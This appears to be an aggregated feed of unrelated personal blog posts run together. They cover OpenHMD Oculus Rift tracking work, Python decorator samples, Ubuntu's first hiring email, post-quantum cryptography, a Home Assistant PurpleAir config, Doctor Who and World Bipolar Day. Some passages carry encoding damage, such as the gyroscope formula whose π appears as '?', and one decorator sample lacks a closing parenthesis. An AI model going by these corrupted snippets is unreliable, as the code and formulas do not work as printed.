I mentioned the recording simulator continues to progress. Since the tracking problems are now getting really tricky to figure out, this tool is becoming increasingly important. So far, I have code in OpenHMD to record all video and tracking data to a .mkv file. Then, there’s a simulator tool that loads those recordings. Currently it is capable of extracting the data back out of the recording, parsing the JSON and decoding the video, and presenting it to a partially implemented simulator that then runs the same blob analysis and tracking OpenHMD does. The end goal is a Godot based visualiser for this simulation, and to be able to step back and forth through time examining what happened at critical moments so I can improve the tracking for those situations.
To make recordings, there’s the rift-debug-gstreamer-record branch of OpenHMD. If you have GStreamer and the right plugins (gst-plugins-good) installed, and you set env vars like this, each run of OpenHMD will generate a recording in the target directory (make sure the target dir exists):
export OHMD_TRACE_DIR=/home/user/openhmd-traces/
export OHMD_FULL_RECORDING=1
The next things that are calling to me are to improve the room configuration estimation and storage as mentioned above – to detect when the poses a camera is reporting don’t make sense because it’s been bumped or moved.
I’d also like to add back in tracking of the LEDS on the back of the headset headband, to support 360 tracking. I disabled those because they cause me trouble – the headband is adjustable relative to the headset, so the LEDs don’t appear where the 3D model says they should be and that causes jitter and pose mismatches. They need special handling.
One last thing I’m finding exciting is a new person taking an interest in Rift S and starting to look at inside-out tracking for that. That’s just happened in the last few days, so not much to report yet – but I’ll be happy to have someone looking at that while I’m still busy over here in CV1 land!
As always, if you have any questions, comments or testing feedback – hit me up at thaytan@noraisin.net or on @thaytan Twitter/IRC.
Thank you to the kind people signed up as Github Sponsors for this project!
For a long time computer manufacturers have tried to differentiate themselves and their products from their competitors with fancy names with odd capitalisation and spelling. But as an author, using these names does a disservice to the reader: how are they to know that DEC is pronounced as if it was written Dec ("deck").
It's time we pushed back, and wrote for our readers, not for corporations.
It's time to use standard English rules for these Corporate Fancy Names. Proper names begin with a capital, unlike "ciscoSystems®" (so bad that Cisco itself moved away from it). Words are separated by spaces, so "Cisco Systems". Abbreviations and acronyms are written in lower case if they are pronounced as a word, in upper case if each letter is pronounced: so "ram" and "IBM®".
So from here on in I'll be using the following:
I'd encourage you to try this in your own writing. It does look odd for the first time, but the result is undeniably more readable. If we are not writing to be understood by our audience then we are nothing more than an unpaid member of some corporation's marketing team.
I gave the talk On The Use and Misuse of Decorators as part of PyConline AU 2021, the second in annoyingly long sequence of not-in-person PyCon AU events. Here’s some code samples that you might be interested in:
@property implementationThis shows a demo of @property-style getters. Setters are left as an exercise :)
def demo_property(f):
f.is_a_property = True
return f
class HasProperties:
def __getattribute__(self, name):
ret = super().__getattribute__(name)
if hasattr(ret, "is_a_property"):
return ret()
else:
return ret
class Demo(HasProperties):
@demo_property
def is_a_property(self):
return "I'm a property"
def is_a_function(self):
return "I'm a function"
a = Demo()
print(a.is_a_function())
print(a.is_a_property)
@run (The Scoped Block)@run is a decorator that will run the body of the decorated function, and then store the result of that function in place of the function’s name. It makes it easier to assign the results of complex statements to a variable, and get the advantages of functions having less leaky scopes than if or loop blocks.
def run(f):
return f()
@run
def hello_world():
return "Hello, World!"
print(hello_world)
@apply (Multi-line stream transformers)def apply(transformer, iterable_):
def _applicator(f):
return(transformer(f, iterable_))
return _applicator
@apply(map, range(100)
def fizzbuzzed(i):
if i % 3 == 0 and i % 5 == 0:
return "fizzbuzz"
if i % 3 == 0:
return "fizz"
elif i % 5 == 0:
return "buzz"
else:
return str(i)
def html(f):
builder = HtmlNodeBuilder("html")
f(builder)
return builder.build()
class HtmlNodeBuilder:
def __init__(self, tag_name):
self.tag_name = tag_name
self.nodes = []
def node(self, f):
builder = HtmlNodeBuilder(f.__name__)
f(builder)
self.nodes.append(builder.build())
def text(self, text):
self.nodes.append(text)
def build(self):
nodes = "\n".join(self.nodes)
return f"<{self.tag_name}>\n{nodes}\n</{self.tag_name}>"
@html
def document(b):
@b.node
def head(b):
@b.node
def title(b):
b.text("Hello, World!")
@b.node
def body(b):
for i in range(10, 0, -1):
@b.node
def p(b):
b.text(f"{i}")
This is an incomplete implementation of a code registry for handling simple text processing tasks:
```python
def register(self, input, output):
def _register_code(f):
self.registry[(input, output)] = f
return f
return _register_code
in_type = (iterable[str], (WILDCARD, ) out_type = (Counter, (WILDCARD, frequency))
@registry.register(in_type, out_type) def count_strings(strings):
return Counter(strings)
@registry.register( (iterable[str], (WILDCARD, )), (iterable[str], (WILDCARD, lowercase)) ) def words_to_lowercase(words): …
@registry.register( (iterable[str], (WILDCARD, )), (iterable[str], (WILDCARD, no_punctuation)) ) def words_without_punctuation(words): …
def find_steps( self, input_type, input_attrs, output_type, output_attrs ):
hand_wave()
def give_me(self, input, output_type, output_attrs):
steps = self.find_steps(
type(input), (), output_type, output_attrs
)
temp = input
for step in steps:
temp = step(temp)
return temp
A while ago, I wrote a post about how to build and test my Oculus CV1 tracking code in SteamVR using the SteamVR-OpenHMD driver. I have updated those instructions and moved them to https://noraisin.net/diary/?page_id=1048 – so use those if you’d like to try things out.
The pandemic continues to sap my time for OpenHMD improvements. Since my last post, I have been working on various refinements. The biggest visible improvements are:
Adding velocity and acceleration reporting is needed in VR apps that support throwing things. It means that throwing objects and using gravity-grab to fetch objects works in Half-Life: Alyx, making it playable now.
The rewrite to the pose transformation code fixed problems where the rotation of controller models in VR didn’t match the rotation applied in the real world. Controllers would appear attached to the wrong part of the hand, and rotate around the wrong axis. Movements feel more natural now.
My focus going forward is on fixing glitches that are caused by tracking losses or outliers. Those problems happen when the computer vision code either fails to match what the cameras see to the device LED models, or when it matches incorrectly.
Tracking failure leads to the headset view or controllers ‘flying away’ suddenly. Incorrect matching leads to controllers jumping and jittering to the wrong pose, or swapping hands. Either condition is very annoying.
Unfortunately, as the tracking has improved the remaining problems get harder to understand and there is less low-hanging fruit for improvement. Further, when the computer vision runs at 52Hz, it’s impossible to diagnose the reasons for a glitch in real time.
I’ve built a branch of OpenHMD that uses GStreamer to record the CV1 camera video, plus IMU and tracking logs into a video file.
To go with those recordings, I’ve been working on a replay and simulation tool, that uses the Godot game engine to visualise the tracking session. The goal is to show, frame-by-frame, where OpenHMD thought the cameras, headset and controllers were at each point in the session, and to be able to step back and forth through the recording.
Right now, I’m working on the simulation portion of the replay, that will use the tracking logs to recreate all the poses.
I’ve been asked more than once what it was like at the beginning of Ubuntu, before it was a company, when an email from someone I’d never heard of came into my mailbox.
We’re coming up on 20 years now since Ubuntu was founded, and I had cause to do some spelunking into IMAP archives recently… while there I took the opportunity to grab the very first email I received.
The Ubuntu long shot succeeded wildly. Of course, we liked to joke about how spammy those emails where: cold-calling a raft of Debian developers with job offers, some of them were closer to phishing attacks :). This very early one – I was the second employee (though I started at 4 days a week to transition my clients gradually) – was less so.
I think its interesting though to note how explicit a gamble this was framed as: a time limited experiment, funded for a year. As the company scaled this very rapidly became a hiring problem and the horizon had to be pushed out to 2 years to get folk to join.
And of course, while we started with arch in earnest, we rapidly hit significant usability problems, some of which were solvable with porcelain and shallow non-architectural changes, and we built initially patches, and then the bazaar VCS project to tackle those. But others were not: for instance, I recall exceeding the 32K hard link limit on ext3 due to a single long history during a VCS conversion. The sum of these challenges led us to create the bzr project, a ground up rethink of our version control needs, architecture, implementation and user-experience. While ultimately git has conquered all, bzr had – still has in fact – extremely loyal advocates, due to its laser sharp focus on usability.
Anyhow, here it is: one of the original no-name-here-yet, aka Ubuntu, introductory emails (with permission from Mark, of course). When I clicked through to the website Mark provided there was a link there to a fantastical website about a space tourist… not what I had expected to be reading in Adelaide during LCA 2004.
From: Mark Shuttleworth <xxx@xxx>
To: Robert Collins <xxx@xxx>
Date: Thu, 15 Jan 2004, 04:30
Tom Lord gave me your email address, I believe he’s
already sent you the email that I sent him so I’m sure
you have some background.
In short, I am going to fund some open source
development for a year. This is part of a new project
that I will be getting off the ground in the coming
weeks. I don’t know where it will lead, it’s flying in
the face of a stiff breeze but I think at the end of
the day it will at least fund a few very good open
source developers for a full year to work on the
projects they like most.
One of the pieces of the puzzle is high end source
code management. I’ll be looking to build an
infrastructure that will manage source code for
between 100 and 8000 open source projects (yes,
there’s a big difference between the two, I don’t know
at which end of the spectrum we will be at the end of
the year but our infrastructure will have to at least
be capable of scaling to the latter within two years)
with upwards of 2000 developers, drawing code from a
variety of sources, playing with it and spitting it
out regularly in nice packages.
Arch and Subversion seem to be the two leading
contenders for “next generation open source sccm”. I’d
be interested in your thoughts on the two of them, and
how they stack up. I’m looking to hire one person who
will lead that part of the effort. They’ll work alone
from home, and be responsible for two things. First,
extending the tool (arch or svn) in ways that help the
project. Such extensions will be released under an
open source licence, and hopefully embraced by the
tools maintainers and included in the mainline code
for the tool. And second, they will be responsible for
our large-scale implementation of SCCM, using that
tool, and building the management scripts and other
infrastructure to support such a large, and hopefully
highly automated, set of repositories.
Would you be interested in this position? What
attributes and experience do you think would make you
a great person to have on the team? What would your
salary expectation be, as a monthly figure, for a one
year contract full time?
I’m currently on your continent, well, just off it. On
Lizard Island, up North. Am headed today for Brisbane,
then on the 17th to Launceston via Melbourne. If you
happen to be on any of those stops, would you be
interested in meeting up to discuss it further?
If you’re curious you can find out a bit more about me
at www.markshuttleworth.com. This project is much
lower key than some of what you’ll find there. It’s a
very long shot indeed. But if at worst all that
happens is a bunch of open source work gets funded at
my expense I’ll feel it was money well spent.
Cheers,
Mark
=====
—
“Good judgement comes from experience, and often experience
comes from bad judgement” – Rita Mae Brown
I have always liked cryptography, and public-key cryptography in particularly. When Pretty Good Privacy (PGP) first came out in 1991, I not only started using it, also but looking at the documentation and the code to see how it worked. I created my own implementation in C using very small keys, just to better understand.
Cryptography has been running a race against both faster and cheaper computing power. And these days, with banking and most other aspects of our lives entirely relying on secure communications, it’s a very juicy target for bad actors.
About 5 years ago, the National (USA) Institute for Science and Technology (NIST) initiated a search for cryptographic algorithmic that should withstand a near-future world where quantum computers with a significant number of qubits are a reality. There have been a number of rounds, which mid 2020 saw round 3 and the finalists.
This submission caught my eye some time ago: Classic McEliece, and out of the four finalists it’s the only one that is not lattice-based [wikipedia link].
For Public Key Encryption and Key Exchange Mechanism, Prof Bill Buchanan thinks that the winner will be lattice-based, but I am not convinced.
Tiny side-track, you may wonder where does the McEleice name come from? From mathematician Robert McEleice (1942-2019). McEleice developed his cryptosystem in 1978. So it’s not just named after him, he designed it. For various reasons that have nothing to do with the mathematical solidity of the ideas, it didn’t get used at the time. He’s done plenty cool other things, too. From his Caltech obituary:
He made fundamental contributions to the theory and design of channel codes for communication systems—including the interplanetary telecommunication systems that were used by the Voyager, Galileo, Mars Pathfinder, Cassini, and Mars Exploration Rover missions.
Back to lattices, there are both unknowns (aspects that have not been studied in exhaustive depth) and recent mathematical attacks, both of which create uncertainty – in the crypto sphere as well as for business and politics. Given how long it takes for crypto schemes to get widely adopted, the latter two are somewhat relevant, particularly since cyber security is a hot topic.
Lattices are definitely interesting, but given what we know so far, it is my feeling that systems based on lattices are more likely to be proven breakable than Classic McEleice, which come to this finalists’ table with 40+ years track record of in-depth analysis. Mind that all finalists are of course solid at this stage – but NIST’s thoughts on expected developments and breakthroughs is what is likely to decide the winner. NIST are not looking for shiny, they are looking for very very solid in all possible ways.
Prof Buchanan recently published implementations for the finalists, and did some benchmarks where we can directly compare them against each other.
We can see that Classic McEleice’s key generation is CPU intensive, but is that really a problem? The large size of its public key may be more of a factor (disadvantage), however the small ciphertext I think more than offsets that disadvantage.
As we’re nearing the end of the NIST process, in my opinion, fast encryption/decryption and small cyphertext, combined with the long track record of in-depth analysis, may still see Classic McEleice come out the winner.
The post Classic McEleice and the NIST search for post-quantum crypto first appeared on Lentz family blog.Living in California, I’ve (sadly) grown accustomed to needing to keep track of our local air quality index (AQI) ratings, particularly as we live close to places where large wildfires happen every other year.
Last year, Josh and I bought a PurpleAir outdoor air quality meter, which has been great. We contribute our data to a collection of very local air quality meters, which is important, since the hilly nature of the North Bay means that the nearest government air quality ratings can be significantly different to what we experience here in Petaluma.
I recently went looking to pull my PurpleAir sensor data into my Home Assistant setup. Unfortunately, the PurpleAir API does not return the AQI metric for air quality, only the raw PM2.5/PM5/PM10 numbers. After some searching, I found a nice template sensor solution on the Home Assistant forums, which I’ve modernised by adding the AQI as a sub-sensor, and adding unique ID fields to each useful sensor, so that you can assign them to a location.
You’ll end up with sensors for raw PM2.5, the PM2.5 AQI value, the US EPA air quality category, air pressure, relative humidity and air pressure.
First up, visit the PurpleAir Map, find the sensor you care about, click “get this widget�, and then “JSON�. That will give you the URL to set as the resource key in purpleair.yaml.
In HomeAssistant, add the following line to your configuration.yaml:
sensor: !include purpleair.yaml
and then add the following contents to purpleair.yaml
- platform: rest
name: 'PurpleAir'
# Substitute in the URL of the sensor you care about. To find the URL, go
# to purpleair.com/map, find your sensor, click on it, click on "Get This
# Widget" then click on "JSON".
resource: https://www.purpleair.com/json?key={KEY_GOES_HERE}&show={SENSOR_ID}
# Only query once a minute to avoid rate limits:
scan_interval: 60
# Set this sensor to be the AQI value.
#
# Code translated from JavaScript found at:
# https://docs.google.com/document/d/15ijz94dXJ-YAZLi9iZ_RaBwrZ4KtYeCy08goGBwnbCU/edit#
value_template: >
{{ value_json["results"][0]["Label"] }}
unit_of_measurement: ""
# The value of the sensor can't be longer than 255 characters, but the
# attributes can. Store away all the data for use by the templates below.
json_attributes:
- results
- platform: template
sensors:
purpleair_aqi:
unique_id: 'purpleair_SENSORID_aqi_pm25'
friendly_name: 'PurpleAir PM2.5 AQI'
value_template: >
{% macro calcAQI(Cp, Ih, Il, BPh, BPl) -%}
{{ (((Ih - Il)/(BPh - BPl)) * (Cp - BPl) + Il)|round|float }}
{%- endmacro %}
{% if (states('sensor.purpleair_pm25')|float) > 1000 %}
invalid
{% elif (states('sensor.purpleair_pm25')|float) > 350.5 %}
{{ calcAQI((states('sensor.purpleair_pm25')|float), 500.0, 401.0, 500.0, 350.5) }}
{% elif (states('sensor.purpleair_pm25')|float) > 250.5 %}
{{ calcAQI((states('sensor.purpleair_pm25')|float), 400.0, 301.0, 350.4, 250.5) }}
{% elif (states('sensor.purpleair_pm25')|float) > 150.5 %}
{{ calcAQI((states('sensor.purpleair_pm25')|float), 300.0, 201.0, 250.4, 150.5) }}
{% elif (states('sensor.purpleair_pm25')|float) > 55.5 %}
{{ calcAQI((states('sensor.purpleair_pm25')|float), 200.0, 151.0, 150.4, 55.5) }}
{% elif (states('sensor.purpleair_pm25')|float) > 35.5 %}
{{ calcAQI((states('sensor.purpleair_pm25')|float), 150.0, 101.0, 55.4, 35.5) }}
{% elif (states('sensor.purpleair_pm25')|float) > 12.1 %}
{{ calcAQI((states('sensor.purpleair_pm25')|float), 100.0, 51.0, 35.4, 12.1) }}
{% elif (states('sensor.purpleair_pm25')|float) >= 0.0 %}
{{ calcAQI((states('sensor.purpleair_pm25')|float), 50.0, 0.0, 12.0, 0.0) }}
{% else %}
invalid
{% endif %}
unit_of_measurement: "bit"
purpleair_description:
unique_id: 'purpleair_SENSORID_description'
friendly_name: 'PurpleAir AQI Description'
value_template: >
{% if (states('sensor.purpleair_aqi')|float) >= 401.0 %}
Hazardous
{% elif (states('sensor.purpleair_aqi')|float) >= 301.0 %}
Hazardous
{% elif (states('sensor.purpleair_aqi')|float) >= 201.0 %}
Very Unhealthy
{% elif (states('sensor.purpleair_aqi')|float) >= 151.0 %}
Unhealthy
{% elif (states('sensor.purpleair_aqi')|float) >= 101.0 %}
Unhealthy for Sensitive Groups
{% elif (states('sensor.purpleair_aqi')|float) >= 51.0 %}
Moderate
{% elif (states('sensor.purpleair_aqi')|float) >= 0.0 %}
Good
{% else %}
undefined
{% endif %}
entity_id: sensor.purpleair
purpleair_pm25:
unique_id: 'purpleair_SENSORID_pm25'
friendly_name: 'PurpleAir PM 2.5'
value_template: "{{ state_attr('sensor.purpleair','results')[0]['PM2_5Value'] }}"
unit_of_measurement: "μg/m3"
entity_id: sensor.purpleair
purpleair_temp:
unique_id: 'purpleair_SENSORID_temperature'
friendly_name: 'PurpleAir Temperature'
value_template: "{{ state_attr('sensor.purpleair','results')[0]['temp_f'] }}"
unit_of_measurement: "°F"
entity_id: sensor.purpleair
purpleair_humidity:
unique_id: 'purpleair_SENSORID_humidity'
friendly_name: 'PurpleAir Humidity'
value_template: "{{ state_attr('sensor.purpleair','results')[0]['humidity'] }}"
unit_of_measurement: "%"
entity_id: sensor.purpleair
purpleair_pressure:
unique_id: 'purpleair_SENSORID_pressure'
friendly_name: 'PurpleAir Pressure'
value_template: "{{ state_attr('sensor.purpleair','results')[0]['pressure'] }}"
unit_of_measurement: "hPa"
entity_id: sensor.purpleair
I had difficulty getting the AQI to display as a numeric graph when I didn’t set a unit. I went with bit, and that worked just fine. 🤷�♂�
So, this idea has been brewing for a while now… try and watch all of Doctor Who. All of it. All 38 seasons. Today(ish), we started. First up, from 1963 (first aired not quite when intended due to the Kennedy assassination): An Unearthly Child. The first episode of the first serial.
A lot of iconic things are there from the start: the music, the Police Box, embarrassing moments of not quite remembering what time one is in, and normal humans accidentally finding their way into the TARDIS.
I first saw this way back when a child, where they were repeated on ABC TV in Australia for some anniversary of Doctor Who (I forget which one). Well, I saw all but the first episode as the train home was delayed and stopped outside Caulfield for no reason for ages. Some things never change.
Of course, being a show from the early 1960s, there’s some rougher spots. We’re not about to have the picture of diversity, and there’s going to be casual racism and sexism. What will be interesting is noticing these things today, and contrasting with my memory of them at the time (at least for episodes I’ve seen before), and what I know of the attitudes of the time.
“This year-ometer is not calculating properly” is a very 2020 line though (technically from the second episode).
It’s been a while since my last post about tracking support for the Oculus Rift in February. There’s been big improvements since then – working really well a lot of the time. It’s gone from “If I don’t make any sudden moves, I can finish an easy Beat Saber level” to “You can’t hide from me!” quality.
Equally, there are still enough glitches and corner cases that I think I’ll still be at this a while.
Here’s a video from 3 weeks ago of (not me) playing Beat Saber on Expert+ setting showing just how good things can be now:
Strap in. Here’s what I’ve worked on in the last 6 weeks:
Most of the biggest improvements have come from improving the computer vision algorithm that’s matching the observed LEDs (blobs) in the camera frames to the 3D models of the devices.
I split the brute-force search algorithm into 2 phases. It now does a first pass looking for ‘obvious’ matches. In that pass, it does a shallow graph search of blobs and their nearest few neighbours against LEDs and their nearest neighbours, looking for a match using a “Strong” match metric. A match is considered strong if expected LEDs match observed blobs to within 1.5 pixels.
Coupled with checks on the expected orientation (matching the Gravity vector detected by the IMU) and the pose prior (expected position and orientation are within predicted error bounds) this short-circuit on the search is hit a lot of the time, and often completes within 1 frame duration.
In the remaining tricky cases, where a deeper graph search is required in order to recover the pose, the initial search reduces the number of LEDs and blobs under consideration, speeding up the remaining search.
I also added an LED size model to the mix – for a candidate pose, it tries to work out how large (in pixels) each LED should appear, and use that as a bound on matching blobs to LEDs. This helps reduce mismatches as devices move further from the camera.
When a brute-force search for pose recovery completes, the system now knows the identity of various blobs in the camera image. One way it avoids a search next time is to transfer the labels into future camera observations using optical-flow tracking on the visible blobs.
The problem is that even sped-up the search can still take a few frame-durations to complete. Previously LED labels would be transferred from frame to frame as they arrived, but there’s now a unique ID associated with each blob that allows the labels to be transferred even several frames later once their identity is known.
One of the problems with reverse engineering is the guesswork around exactly what different values mean. I was looking into why the controller movement felt “swimmy” under fast motions, and one thing I found was that the interpretation of the gyroscope readings from the IMU was incorrect.
The touch controllers report IMU angular velocity readings directly as a 16-bit signed integer. Previously the code would take the reading and divide by 1024 and use the value as radians/second.
From teardowns of the controller, I know the IMU is an Invensense MPU-6500. From the datasheet, the reported value is actually in degrees per second and appears to be configured for the +/- 2000 °/s range. That yields a calculation of Gyro-rad/s = Gyro-°/s * (2000 / 32768) * (?/180) – or a divisor of 938.734.
The 1024 divisor was under-estimating rotation speed by about 10% – close enough to work until you start moving quickly.
If we don’t find a device in the camera views, the fusion filter predicts motion using the IMU readings – but that quickly becomes inaccurate. In the worst case, the controllers fly off into the distance. To avoid that, I added a limit of 500ms for ‘coasting’. If we haven’t recovered the device pose by then, the position is frozen in place and only rotation is updated until the cameras find it again.
I implemented a 1-Euro exponential smoothing filter on the output poses for each device. This is an idea from the Project Esky driver for Project North Star/Deck-X AR headsets, and almost completely eliminates jitter in the headset view and hand controllers shown to the user. The tradeoff is against introducing lag when the user moves quickly – but there are some tunables in the exponential filter to play with for minimising that. For now I’ve picked some values that seem to work reasonably.
Communications with the touch controllers happens through USB radio command packets sent to the headset. The main use of radio commands in OpenHMD is to read the JSON configuration block for each controller that is programmed in at the factory. The configuration block provides the 3D model of LED positions as well as initial IMU bias values.
Unfortunately, reading the configuration block takes a couple of seconds on startup, and blocks everything while it’s happening. Oculus saw that problem and added a checksum in the controller firmware. You can read the checksum first and if it hasn’t changed use a local cache of the configuration block. Eventually, I’ll implement that caching mechanism for OpenHMD but in the meantime it still reads the configuration blocks on each startup.
As an interim improvement I rewrote the radio communication logic to use a state machine that is checked in the update loop – allowing radio communications to be interleaved without blocking the regularly processing of events. It still interferes a bit, but no longer causes a full multi-second stall as each hand controller turns on.
The hand controllers have haptic feedback ‘rumble’ motors that really add to the immersiveness of VR by letting you sense collisions with objects. Until now, OpenHMD hasn’t had any support for applications to trigger haptic events. I spent a bit of time looking at USB packet traces with Philipp Zabel and we figured out the radio commands to turn the rumble motors on and off.
In the Rift CV1, the haptic motors have a mode where you schedule feedback events into a ringbuffer – effectively they operate like a low frequency audio device. However, that mode was removed for the Rift S (and presumably in the Quest devices) – and deprecated for the CV1.
With that in mind, I aimed for implementing the unbuffered mode, with explicit ‘motor on + frequency + amplitude’ and ‘motor off’ commands sent as needed. Thanks to already having rewritten the radio communications to use a state machine, adding haptic commands was fairly easy.
The big question mark is around what API OpenHMD should provide for haptic feedback. I’ve implemented something simple for now, to get some discussion going. It works really well and adds hugely to the experience. That code is in the https://github.com/thaytan/OpenHMD/tree/rift-haptics branch, with a SteamVR-OpenHMD branch that uses it in https://github.com/thaytan/SteamVR-OpenHMD/tree/controller-haptics-wip
I’d say the biggest problem right now is unexpected tracking loss and incorrect pose extractions when I’m not expecting them. Especially my right controller will suddenly glitch and start jumping around. Looking at a video of the debug feed, it’s not obvious why that’s happening:
To fix cases like those, I plan to add code to log the raw video feed and the IMU information together so that I can replay the video analysis frame-by-frame and investigate glitches systematically. Those recordings will also work as a regression suite to test future changes.
The Kalman filter I have implemented works really nicely – it does the latency compensation, predicts motion and extracts sensor biases all in one place… but it has a big downside of being quite expensive in CPU. The Unscented Kalman Filter CPU cost grows at O(n^3) with the size of the state, and the state in this case is 43 dimensional – 22 base dimensions, and 7 per latency-compensation slot. Running 1000 updates per second for the HMD and 500 for each of the hand controllers adds up quickly.
At some point, I want to find a better / cheaper approach to the problem that still provides low-latency motion predictions for the user while still providing the same benefits around latency compensation and bias extraction.
To generate a convincing illusion of objects at a distance in a headset that’s only a few centimetres deep, VR headsets use some interesting optics. The LCD/OLED panels displaying the output get distorted heavily before they hit the users eyes. What the software generates needs to compensate by applying the right inverse distortion to the output video.
Everyone that tests the CV1 notices that the distortion is not quite correct. As you look around, the world warps and shifts annoyingly. Sooner or later that needs fixing. That’s done by taking photos of calibration patterns through the headset lenses and generating a distortion model.
The camera feeds are captured using a custom user-space UVC driver implementation that knows how to set up the special synchronisation settings of the CV1 and DK2 cameras, and then repeatedly schedules isochronous USB packet transfers to receive the video.
Occasionally, some people experience failure to re-schedule those transfers. The kernel rejects them with an out-of-memory error failing to set aside DMA memory (even though it may have been running fine for quite some time). It’s not clear why that happens – but the end result at the moment is that the USB traffic for that camera dies completely and there’ll be no more tracking from that camera until the application is restarted.
Often once it starts happening, it will keep happening until the PC is rebooted and the kernel memory state is reset.
Tracking generally works well when the cameras get a clear shot of each device, but there are cases like sighting down the barrel of a gun where we expect that the user will line up the controllers in front of one another, and in front of the headset. In that case, even though we probably have a good idea where each device is, it can be hard to figure out which LEDs belong to which device.
If we already have a good tracking lock on the devices, I think it should be possible to keep tracking even down to 1 or 2 LEDs being visible – but the pose assessment code will have to be aware that’s what is happening.
April 14th marks 2 years since I first branched off OpenHMD master to start working on CV1 tracking. How hard can it be, I thought? I’ll knock this over in a few months.
Since then I’ve accumulated over 300 commits on top of OpenHMD master that eventually all need upstreaming in some way.
One thing people have expressed as a prerequisite for upstreaming is to try and remove the OpenCV dependency. The tracking relies on OpenCV to do camera distortion calculations, and for their PnP implementation. It should be possible to reimplement both of those directly in OpenHMD with a bit of work – possibly using the fast LambdaTwist P3P algorithm that Philipp Zabel wrote, that I’m already using for pose extraction in the brute-force search.
I’ve picked the top issues to highlight here. https://github.com/thaytan/OpenHMD/issues has a list of all the other things that are still on the radar for fixing eventually.
At some point soon, I plan to put a pin in the CV1 tracking and look at adapting it to more recent inside-out headsets like the Rift S and WMR headsets. I implemented 3DOF support for the Rift S last year, but getting to full positional tracking for that and other inside-out headsets means implementing a SLAM/VIO tracking algorithm to track the headset position.
Once the headset is tracking, the code I’m developing here for CV1 to find and track controllers will hopefully transfer across – the difference with inside-out tracking is that the cameras move around with the headset. Finding the controllers in the actual video feed should work much the same.
This development happens mostly in my spare time and partly as open source contribution time at work at Centricular. I am accepting funding through Github Sponsorships to help me spend more time on it – I’d really like to keep helping Linux have top-notch support for VR/AR applications. Big thanks to the people that have helped get this far.
Today, 30 March, is World Bipolar Day.
Why that particular date? It’s Vincent van Gogh’s birthday (1853), and there is a fairly strong argument that the Dutch painter suffered from bipolar (among other things).
The image on the side is Vincent’s drawing “Worn Out” (from 1882), and it seems to capture the feeling rather well – whether (hypo)manic, depressed, or mixed. It’s exhausting.
Bipolar is complicated, often undiagnosed or misdiagnosed, and when only treated with anti-depressants, it can trigger the (hypo)mania – essentially dragging that person into that state near-permanently.
Hypo-mania is the “lesser” form of mania that distinguishes Bipolar I (the classic “manic depressive” syndrome) from Bipolar II. It’s “lesser” only in the sense that rather than someone going so hyper they may think they can fly (Bipolar I is often identified when someone in manic state gets admitted to hospital – good catch!) while with Bipolar II the hypo-mania may actually exhibit as anger. Anger in general, against nothing in particular but potentially everyone and everything around them. Or, if it’s a mixed episode, anger combined with strong negative thoughts. Either way, it does not look like classic mania. It is, however, exhausting and can be very debilitating.
Bipolar II people often present to a doctor while in depressed state, and GPs (not being psychiatrists) may not do a full diagnosis. Note that D.A.S. and similar test sheets are screening tools, they are not diagnostic. A proper diagnosis is more complex than filling in a form some questions (who would have thought!)
If you have a diagnosis of depression, only from a GP, and are on medication for this, I would strongly recommend you also get a referral to a psychiatrist to confirm that diagnosis.
Our friends at the awesome Black Dog Institute have excellent information on bipolar, as well as a quick self-test – if that shows some likelihood of bipolar, go get that referral and follow up ASAP.
I will be writing more about the topic in the coming time.
The post World bipolar day 2021 first appeared on BlueHackers.org.This post documented an older method of building SteamVR-OpenHMD. I moved them to a page here. That version will be kept up to date for any future changes, so go there.
I’ve had a few people ask how to test my OpenHMD development branch of Rift CV1 positional tracking in SteamVR. Here’s what I do:
git clone --recursive https://github.com/ChristophHaag/SteamVR-OpenHMD.git
cd subprojects/openhmd git remote add thaytan-github https://github.com/thaytan/OpenHMD.git git fetch thaytan-github git checkout -b rift-kalman-filter thaytan-github/rift-kalman-filter cd ../../
meson to build and register the SteamVR-OpenHMD binaries. You may need tmeson first (see below):meson -Dbuildtype=release build ninja -C build ./install_files_to_build.sh ./register.sh
./build/subprojects/openhmd/openhmd_simple_example
I prefer the Meson build system here. There’s also a cmake build for SteamVR-OpenHMD you can use instead, but I haven’t tested it in a while and it sometimes breaks as I work on my development branch.
If you need to install meson, there are instructions here – https://mesonbuild.com/Getting-meson.html summarising the various methods.
I use a copy in my home directory, but you need to make sure ~/.local/bin is in your PATH
pip3 install --user meson
I spent some time this weekend implementing a couple of my ideas for improving the way the tracking code in OpenHMD filters and rejects (or accepts) possible poses when trying to match visible LEDs to the 3D models for each device.
In general, the tracking proceeds in several steps (in parallel for each of the 3 devices being tracked):
The goal is to always assign the correct LEDs to the correct device (so you don’t end up with the right controller in your left hand), and to avoid going back to the expensive brute-force search to re-acquire devices as much as possible
What I’ve been working on this week is steps 1 and 3 – initial acquisition of correct poses, and fast validation / refinement of the pose in each video frame, and I’ve implemented two new strategies for that.
The first new strategy is to reject candidate poses that don’t closely match the known direction of gravity for each device. I had a previous implementation of that idea which turned out to be wrong, so I’ve re-worked it and it helps a lot with device acquisition.
The IMU accelerometer and gyro can usually tell us which way up the device is (roll and pitch) but not which way they are facing (yaw). The measure for ‘known gravity’ comes from the fusion Kalman filter covariance matrix – how certain the filter is about the orientation of the device. If that variance is small this new strategy is used to reject possible poses that don’t have the same idea of gravity (while permitting rotations around the Y axis), with the filter variance as a tolerance.
The 2nd strategy is based around tracking with fewer LED correspondences once a tracking lock is acquired. Initial acquisition of the device pose relies on some heuristics for how many LEDs must match the 3D model. The general heuristic threshold I settled on for now is that 2/3rds of the expected LEDs must be visible to acquire a cold lock.
With the new strategy, if the pose prior has a good idea where the device is and which way it’s facing, it allows matching on far fewer LED correspondences. The idea is to keep tracking a device even down to just a couple of LEDs, and hope that more become visible soon.
While this definitely seems to help, I think the approach can use more work.
With these two new approaches, tracking is improved but still quite erratic. Tracking of the headset itself is quite good now and for me rarely loses tracking lock. The controllers are better, but have a tendency to “fly off my hands” unexpectedly, especially after fast motions.
I have ideas for more tracking heuristics to implement, and I expect a continuous cycle of refinement on the existing strategies and new ones for some time to come.
For now, here’s a video of me playing Beat Saber using tonight’s code. The video shows the debug stream that OpenHMD can generate via Pipewire, showing the camera feed plus overlays of device predictions, LED device assignments and tracked device positions. Red is the headset, Green is the right controller, Blue is the left controller.
Initial tracking is completely wrong – I see some things to fix there. When the controllers go offline due to inactivity, the code keeps trying to match LEDs to them for example, and then there are some things wrong with how it’s relabelling LEDs when they get incorrect assignments.
After that, there are periods of good tracking with random tracking losses on the controllers – those show the problem cases to concentrate on.
These lack of updates are also likely because I’ve been quite caught up with stuff.
